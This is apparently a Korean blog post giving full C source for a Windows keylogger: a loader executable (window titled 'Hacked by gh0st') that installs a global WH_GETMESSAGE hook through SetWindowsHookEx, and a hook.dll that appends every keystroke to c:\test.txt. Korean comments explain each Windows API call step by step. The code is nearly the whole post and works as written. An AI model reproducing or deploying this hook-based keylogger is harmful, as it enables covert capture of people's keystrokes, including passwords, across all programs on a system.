AJLab - Since 2012.1.20

proja.exe 소스코드

#include <windows.h>

LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);


HINSTANCE g_hInst;


LPCTSTR lpszClass = TEXT("Hacked by gh0st");

//hInstance 프로그램의 인스턴스핸들

//nCmdShow 프로그램이 실행될 형태이며 최소화,보통 모양 등이 전달

// APIENTRY 는 윈도우즈의 표준 호출규약인 __stdcall 사용

//아래의 Winmain 함수는 일반 C언어에서의 main과 같은 역할을 한다. 즉, 프로그램이 가장 

// 먼저 실행되는 함수이다. 


//  Winmain 함수의 인자가 복잡한데

//간단히 설명해서 hInstance는 프로그램 자체의 포인터이고, hPrevInstance는 해당 프로그램이 

//동시에 몇개가 실행되었는지 파악할 때 사용하는 변수

//lpszCmdParam은 argv와 같이 프로그램의 인자를 의미하고, 마지막으로 nCmdShow는 실행되는 

//프로그램의 모양을 나타낸다.


int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpszCmdParam, int nCmdShow)


{


 HWND hWnd; //hWnd 윈도우 핸들



 MSG Message; // 윈도우에서 발생하는 메시지들을 저장할 변수


 WNDCLASS WndClass; // 화면에 생성할 윈도우 클래스 선언


 g_hInst=hInstance;


 WndClass.cbClsExtra=0;


 WndClass.cbWndExtra=0;


 WndClass.hbrBackground=(HBRUSH)GetStockObject(WHITE_BRUSH); // 메인 윈도우 배경색 지정


 WndClass.hCursor=LoadCursor(NULL,IDC_ARROW); // 윈도우 안에서의 마우스 커서모양 IDC_ARROW 기본 모양인 화살표


 WndClass.hIcon=LoadIcon(NULL,IDI_APPLICATION); //메인 윈도우 아이콘


 WndClass.hInstance=hInstance; // 프로그램의 인스턴스


 WndClass.lpfnWndProc=WndProc; // 이 윈도우에서 발생하는 메시지들을 처리할 함수를 지정


 WndClass.lpszClassName=lpszClass; // 이 윈도우의 클래스 이름


 WndClass.lpszMenuName=NULL; // 윈도우에 붙일 메뉴 지정


 WndClass.style=CS_HREDRAW | CS_VREDRAW; 


 RegisterClass(&WndClass);


 hWnd=CreateWindow(lpszClass,lpszClass,WS_OVERLAPPEDWINDOW,CW_USEDEFAULT,CW_USEDEFAULT,CW_USEDEFAULT,


                   CW_USEDEFAULT, NULL,(HMENU)NULL,hInstance,NULL);

//첫번째 인자는 윈도우를 생성할 때 사용할 클래스명, 두번째 인자는 창의 타이틀바에 들어갈 문자열, 세번째 인자는


// 윈도우의 형태(여기선 기본)

//네,다섯번째는 윈도우를 출력할 X,Y 좌표, 그다음 2개는 창의 좌 우 길이, 나머지 4개는 아래와 같다

// NULL: the parent of this window
// NULL: this application does not have a menu bar
// hInstance: the first parameter from WinMain
// NULL: not used in this application

 ShowWindow(hWnd,nCmdShow); // 위에서 생성한 window를 화면에 출력

 while(GetMessage(&Message,NULL,0,0))


 {


  TranslateMessage(&Message); // 메시지 번역


  DispatchMessage(&Message); // 메시지 처리


 }


 return (int)Message.wParam;


}

// 위 while문은 윈도우 메시지 큐에서 가장 상위에 있는 메시지를 하나 뽑아와서 message 변수에 저장한 후,


// 그것을 번역한 다음 처리하는

// 과정을 담고 있다. 마지막 단계인 처리는 메시지를 메시지처리함수로 전달하는 역할을 한다.


 


LRESULT CALLBACK WndProc(HWND hWnd, UINT iMessage, WPARAM wParam, LPARAM IParam)


{


 static HINSTANCE hinstDll; // LoadLibrary 반환값 저장 변수


 HOOKPROC hGetMsgProc; // GetProcAddress 반환값 저장 변수


 static HHOOK hKeyHook; //SetWindowsHookEx 반환값 저장변수

 switch(iMessage){

//발생한 메시지가 WM_CREATE 일 경우, 즉 윈도우창이 생성되었을 경우 


 case WM_CREATE:

//LoadLibrary 함수는 인자로준 dll을 현재 프로세스의 주소공간으로 mapping 시켜서 사용할 수 있도록 해주는 API 


//이다. 


  hinstDll = LoadLibrary("hook.dll"); // hook.dll load


  if(!hinstDll){


   MessageBox(hWnd, "hooker.dll을 로드할 수 없습니다.", "오류", MB_OK);


   ExitProcess(1);


  }

// GetProcAddress를 이용하여 DLL에서 export한 함수를 가져온다. 즉 hook.dll에서 GetMsgProc 함수를 호출 

hGetMsgProc = (HOOKPROC)GetProcAddress(hinstDll, "GetMsgProc");


  if(!hGetMsgProc){


   MessageBox(hWnd, "GetMsgProc 함수를 찾을 수 없습니다.", "오류", MB_OK);


   FreeLibrary(hinstDll);


   ExitProcess(1);


  }

// SetWindowsHookEx 함수는 자신의 훅 프로시저를 타 어플리케이션으의 훅 체인에 설치한다. 쉽게 말하면 타겟


// 프로그램의 윈도우 메시지 처리 프로시저

// 를 본인이 만든 윈도우 메시지 처리 프로시저로 변경 하는 것을 말한다. 메시지 프로시져 외에 여러가지 


//시스템 콜을 후킹할 수 있다.

// http://ontow.blog.me/140131028775 에서 인자값 확인


  hKeyHook = SetWindowsHookEx(WH_GETMESSAGE, hGetMsgProc, hinstDll, 0);


  if(!hKeyHook){


   MessageBox(hWnd, "Hooking을 성공하지 못했습니다.", "오류", MB_OK);


   FreeLibrary(hinstDll);


   ExitProcess(1);


  }


  return 0;          

 case WM_DESTROY:


  PostQuitMessage(0);


  return 0;


 }

 //DefWindowProc 함수는 WndProc에서 처리하지 않은 나머지 메시지에 관한 처리


 return(DefWindowProc(hWnd,iMessage,wParam,IParam));

}

// 위 메시지를 처리하는 함수는 CALLBACK 타입으로 지정된다. CALLBACK 이라는 것은 이 함수가 사용자에


// 의해 호출되는 것이 아닌, 프로그램에 의해 호출되는 것을 의미한다. 즉 DispatchMessage() 함수에 의해


// 호출된다. 인자들을 살펴보면 hWnd는 이메시지가 발생한 윈도우가 어떤것 이었는지 말해주고, iMessage는


// 실제 발생한 메시지를 나타내며, 마지막 wParam과 IParam은 해당 메시지의 추가 옵션으로 이해하면된다.
// 윈도우 메시지의 종류로 http://cafe.naver.com/pplus.cafe?iframe_url=/ArticleRead.nhn%3Farticleid=167&


//  여기서 확인
 
 
 
hook.dll 소스코드
// GetMsgProc 함수의 원형을 자세히보면 앞서 WndProc 라고 선언했던 CALLBACK 함수와 거의 비슷하다.


// 메시지가 발생했을때
// CALLBACK 함수로 전달된 인자들의 정보가 가공되어 이 GetMsgProc 함수로 전달된다.
// SetWindowsHookEx 함수에 의해 윈도우 내에서 발생하는 모든 메시지가 위 함수를 한번 거친후 자신의


// 본래 작업을 실행하게 된다.
// 즉 메시지발생->GetMsgProc처리->WndProc처리
 
 
#include <windows.h>

__declspec(dllexport) LRESULT CALLBACK GetMsgProc(INT nCode, WPARAM wp, LPARAM lp)
{
// message에서 발생한 메시지를 얻는다 그리고 그 메시지가 WM_KEYDOWN 라면 if문 실행
	if(((MSG*)lp)->message == (long)WM_KEYDOWN)	
	{			 
		HANDLE hFile; // 핸들변수
		DWORD dwWrite; // http://irontooth.tistory.com/117 확인
       	hFile = CreateFile("c:\\test.txt", GENERIC_WRITE, 0, NULL, OPEN_ALWAYS,
			FILE_ATTRIBUTE_NORMAL, NULL); 


                 // http://blog.naver.com/zerolive_?Redirect=Log&logNo=10005814846 확인	
		SetFilePointer(hFile, 0, 0, FILE_END); 


                 //http://irontooth.tistory.com/98 확인			
		WriteFile(hFile, &((MSG*)lp)->wParam, 1, &dwWrite, NULL); 


                 //http://irontooth.tistory.com/117 확인
		CloseHandle(hFile);			
	}
	return TRUE;	
}